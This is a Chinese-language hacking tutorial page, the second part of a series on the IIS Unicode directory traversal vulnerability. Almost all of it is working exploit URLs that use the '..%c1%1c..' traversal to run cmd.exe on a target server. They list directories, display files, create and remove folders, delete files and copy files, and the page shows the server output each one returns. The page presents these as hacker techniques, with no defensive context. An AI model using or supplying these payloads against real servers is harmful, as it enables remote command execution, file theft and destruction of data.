你的位置: 软件>> 网络安全宝典>> 防卫斗士>>


黑客技巧--深入UNICODE编码漏洞(二)
· badboy·

1 2  下一页

三、UNICODE编码漏洞简单利用的命令

  一般情况下我们用http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir看到的目录是空的:(例如)

Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..

  如果我们这样输入的话:http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\就可以看到该主机c:盘的目录和文件。

其它的一些简单的用法:

1、显示文件内容

  如果想显示里面的其中一个badboy.txt文本文件,我们可以这样输入(htm,html,asp,bat等文件都是一样的)http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\badboy.txt
那么该文件的内容就可以通过IE显示出来。

2、建立文件夹的命令

  http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:\badboy运行后我们可以看到

返回这样的结果:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

英文意思是CGI错误
具体的CGI申请有误,不能返回完整的HTTP标题,返回的标题为:

3、删除空的文件夹命令

  http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\badboy

返回信息同上

4、删除文件的命令

  http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\badboy.txt

返回信息同上

5、copy文件且改名的命令

  http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\badboy.txt bad.txt

返回信息:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.

1 2  下一页


感谢访问天极网,如果您觉得该文章涉及版权问题,请看这里!